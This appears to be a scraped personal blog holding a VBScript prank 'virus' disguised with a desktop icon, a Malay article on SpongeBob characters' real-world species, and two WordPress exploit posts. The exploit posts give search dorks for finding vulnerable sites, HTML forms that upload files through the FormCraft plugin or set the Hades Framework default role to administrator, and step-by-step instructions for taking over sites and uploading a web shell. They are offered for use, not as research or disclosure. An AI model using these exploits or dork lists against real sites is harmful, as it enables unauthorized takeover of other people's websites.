Sunday, 31 May 2015

Prank Your Friend With Harmless Virus..

Hello Guys , long time not see right ?? yeah , i still busy.. lot work to do... okay , today i'm gonna share with you all how to make a harmless virus .. follow my step

Requirement:
Notepad

Okay , lets do it !!

1. Open Notepad ..


2. Write this code .. X=MsgBox("Description",5+16,"Tittle")


3. Save file in Virtual Basic Script( .vbs ) 




Now your virus is ready , okay lets change the icon .. How ? follow my step ^-^ 


1. Cut virus.vbs to other folder , as example i put it on my xxx Folder


2.Create a shortcut 


3.Put the shortcut file at desktop or anywhere as you like .. Here , i put at Desktop .. You also can rename it .. Here , i rename it Computer ..  



4. Right click it and click Properties --> Change Icon , Now , choose what icon do you want .. 


5. Now , your virus are all set , send it tou your friends and prank now !!! 


Not understand ? Easily find me at 

Facebook : www.fb.com/7OBUz
Twitter    : www.twitter.com/wazy_MY










Saturday, 14 February 2015

WordPress Plugins FormCraft CSRF Vulnerability



Dork : Inurl:/wp-content/plugins/formcraft/


Exploit : http://site.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php

http://site.com/wp-content/plugins/formcraft/file-upload/server/php/


Script CSRF:

<form method="POST" action="http://www.site.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"

enctype="multipart/form-data">

<input type="file" name="files[]" /><button>Upload</button>

</form>


*Save In HTML File*


1.Find Target Using Dork Given

2.Then Put Exploit Given

3.If Vuln , It Will Show "No File Upload : 2"

4.Put That Vuln Site At CSRF Script
5.Open The HTML File Using Your Default Browser And Upload Your Shell


Shell Access : http://site.com/wp-content/plugins/formcraft/file-upload/server/php/files/yourshell.php


Inbox Me If You Not Understand

Facebook : www.fb.com/7OBUz

Twitter : www.twitter.com/wazy_MY


Thx To Indonesian CyberFreedom Team



Jenis-Jenis Haiwan Laut Dalam Kartun "SpongeBob SeluarPetak"


Sumber daripada Google






Aku Rasa Takde Orang Yang Tak Tau Pasal Kartun SpongeBob SquarePants Ni Kan ?. Kartun SpongeBob SquarePants Ni Berasal Dari Amerika Syarikat(AS) Yang Bercerita Tentang Kehidupan Dalam Laut . Dan Dalam Laut Ni Pulak Ada Bandar Yang Hanya IMAGINASI Sahaja Iaitu "Bikini Bottom" . Aku Selalu Tengok Kartun Ni Time Sekolah Rendah Dulu dan Aku Masih Lagi Layan ^_^ .. Hahaha !


Tapi , Tahukah Anda Haiwan-Haiwan Yang Jadi Watak Dalam Siri Animasi Ini Sebenarnya Wujud ??? Jawapannya Korang Boleh Baca Banyak Lagi Di Artikel Aku Yang Tak Seberapa Ni .. Aku Malas Nak Tulis Panjang-Panjang , Jadi Korang Bacalah Apa Yang Aku Sediakan Ini ...



SpongeBob SquarePant Dalam Sainsnya (Spongia Officinalis)



SpongeBob Ialah Watak Utama Dalam Siri Animasi Ini .Ia Adalah Span Yang Berbentuk Petak Dan Bewarna KuningYang Tinggal Di Dalam Rumah Berbentuk Nanas . PekerjaannyaDalam Siri Animasi Ini Ialah Tukang Masak Di Restoran Makanan Segera Yang Bernama Krusty Krab . Spongebob Ni Selalu Gembira Dan Lawak . Pada Masa Lapang Si Spongebob Ni Suka Tangkap Obor-Obor , Belajar Karate Dan Main Tiup Belon . Spongebob Ni Jugak Mempunyai Haiwan Peliharaan Yang Bernama Gary ..


Penjelasan


Mesti Korang Tak Tahu Yang Span Ni Wujud Dalam Lautan ..Haa , Kalau Korang Nak Tahu , Span Yang Kita Selalu Guna Buat Mandi Dan Basuh Kereta Tu Berasal Dari Haiwan Yang Bernama Spongia Officinalis .. Cikgu Sains Aku Cakap Kalau Nak Jumpa Haiwan Ni , Biasanya Dia Ada Dalam Laut Bersama Dengan Gamat ..




Patrick Star Dalam Sainsnya (Pisaster Brevispinus)


Patrick Star Ni Kawan Baik Dengan SpongeBob ... Ciri-Ciri Patrick Ni Mempunyai Fizikal Yang Gemuk Dan Kepalanya Berbentuk Seperti Kon .. Kedua-duanya Sering Melakukan Aktiviti Bersama-Sama Sebagai Contoh Menangkap Obor-Obor .. Rumahnya Berbentuk Separuh Sfera Dan Kelihatan Seperti Batu Dan Jaraknya Tidak Jauh Dari Rumah Spongebob Yang Dipisahkan Oleh Rumah Squidward , Siapa Pulak Squidward Ni ? Nanti Aku Cerita . Patrick Ni Bukan Sahaja Pemalas Malah Suka Makan Dan Bodoh ...


Penjelasan

Haiwan Ini Dikenali Sebagai Tapak Sulaiman Dan Juga Sangat Dikenali Oleh Manusia .. Haiwan Ini Mempunyai 5 Lengan Dan Boleh Membesar Hingga 60cm . Badannya Bewarna Merah Jambu Dan Bahagian Atasnya Mempunyai Duri-Duri Kecil Yang Panjangnya Boleh Mencapai 2mm(milimeter) .





Squidward Tentacle Dalam Sainsnya (Octopus Vulgaris)

Squidward Adalah Jiran Kepada Spongebob Dan Juga Patrick .Ia Memiliki Tubuh Badan Yang Kurus Dengan Kepala Dan Hidung Yang Besar . Malah Dia Juga Mempunyai Banyak Kaki . Squidward Ni Sangat Benci Dekat Spongebob Dan Patrick Sebab Dia Anggap Spongebob Dan Patrick Ni Suka Buat Bising Dan Berperangai Seperti Kanak-Kanak (HyperActive) . Squidward Ni Pun Bekerja Bersama-sama Dengan Spongebob , Tapi Hanya Dibezakan Dengan Kerja Je , Spongebob Kerja Tukang Masak , Tapi Dia Bekerja Sebagai Jurujual .




Penjelasan


Sotong Gurita Biasa (Common Octopus) Ialah Spesis Sotong Yang Boleh Membesar Hingga Ukuran 90cm . Tuuhnya Berbentuk Bulat Dan Mempunyai 8 Tangan . Haiwan Ini Boleh Ditemui Di Semua Perairan Yang Suhunya Tidak Terlalu Sejuk Dan Mempunyai Kedalaman Maksimal 200m .





Gary Dalam Sainsnya (Lunatia Heros)

Gary Adalah Haiwan Peliharaan Spongebob , Walaupun Dia Ni Siput , Tapi Dia Boleh Mengeow Macam Kucing Biasa . Gary Ni Kalau Dimarahi Oleh Spongebob Dia Cool n Mengeow Je .. Hahaha , Aku Suka Watak Gary Ni . Dia Ni Tak Suka Mandi Tapi Suka Berendam Dalam Lumpur . Squidward Sangat Geli Akan Gary Ni Sebab Gary ni Suka Meninggalkan Jejak Lendir Yang Licin Di Halaman Rumah Squidward ...

Penjelasan

Siput Bulan Utara (Northern Moon Snail) Adalah Spesis Siput Laut Yang Hanya Boleh Ditemui Di Pantai Timur Kanada Dan Pantai Timur Amerika Syarikat(AS) . Cengkerangnya Berbentuk Bulat Dan Bewarna Coklat Kemerahan .






Mr Krab Dalam Sainsnya (Ocypode Quadrata)

Encik Krab Ialah Pengusaha Restoran Krusty Krab Dimana Tempat Spongebob Dan Squidward Bekerja . Encik Krab Ni Pantang Je Dengar Perkataan "Duit" Terus Jadi Bersemangat . Encik Krab Ni Mempunyai Tubuh Badan Yang Gemuk , Mata Yang Panjang Dan Tangannya Seperti Penyepit Ketam . Encik Krab Ni Tengok Je Macam Tu , Tapi Dia Ada Musuh Yang Bernama Plankton .. Adoi , Sape Pulak Plankton Ni ? Teruskan Membaca ^_^

Penjelasan

Ketam Hantu Atlantik(Atlantic Ghost Crab) Adalah Satu Spesis Ketam Yang Hanya Boleh Ditemui Di Atlantic Ocean . Haiwan Ini Boleh Dibezakan Dengan Ketam Yang Lain Dimana Matanya Lebih Panjang Dan Badannya Yang Kecil . Ketam Ni Biasanya Korek Lubang Apabila Matahari Bersinar , Manakala Ketam Ini Akan Aktif Jika Matahari Terbenam .













































Friday, 13 February 2015

WordPress 0day - Hades Framework Add Admin Vulnerability

WordPress Hades framework suffers from Unauthenticated Configuration Access.
the vulnerability allow the attacker to change the default user type to administrator,
then allows anyone to register. This allows the attacker to register and become
an administrator.

There's Many WordPress Themes/Plugins Vulnerable...

inurl:/wp-content/themes/appius/
inurl:/wp-content/themes/Consultant/
inurl:/wp-content/themes/appius1/
inurl:/wp-content/themes/archin/
inurl:/wp-content/themes/averin/
inurl:/wp-content/themes/dagda/
inurl:/wp-content/themes/echea/
inurl:/wp-content/themes/felici/
inurl:/wp-content/themes/kmp/
inurl:/wp-content/themes/kmp2/
inurl:/wp-content/themes/liberal/
inurl:/wp-content/themes/liberal-media-bias/
inurl:/wp-content/themes/linguini/
inurl:/wp-content/themes/livewire/
inurl:/wp-content/themes/majestics/
inurl:/wp-content/themes/mathis/
inurl:/wp-content/themes/mazine/
inurl:/wp-content/themes/Orchestra/
inurl:/wp-content/themes/shopsum/
inurl:/wp-content/themes/shotzz/
inurl:/wp-content/themes/test/
inurl:/wp-content/themes/Viteeo/
inurl:/wp-content/themes/vithy/
inurl:/wp-content/themes/yvora/
inurl:/wp-content/themes/sodales/

inurl:/hades_framework/


Exploit :
<form action="http://127.0.0.1/wp-content/themes/{%THEME%}/hades_framework/option_panel/ajax.php" method="POST">
<input name="values[0][name]" value="users_can_register">
<input name="values[0][value]" value="1">
<input name="values[1][name]" value="admin_email">
<input name="values[1][value]" value="{%YOUR_EMAIL}">
<input name="values[2][name]" value="default_role">
<input name="values[2][value]" value="administrator">
<input name="action" value="save">
<input type="submit" value="Submit">
</form>

*Save In Html File*
 

1. Change {%THEME%} with the vulnerable theme, {%YOUR_EMAIL} with your email address.
2. If That Site Vuln , It Will Show Success Text 

3. go to http://site.com/wp-login.php?action=register, you will see the registration form.
4. choose your username & email address and register.
5. go to your email, you will find your password.
6. then login & and upload your shell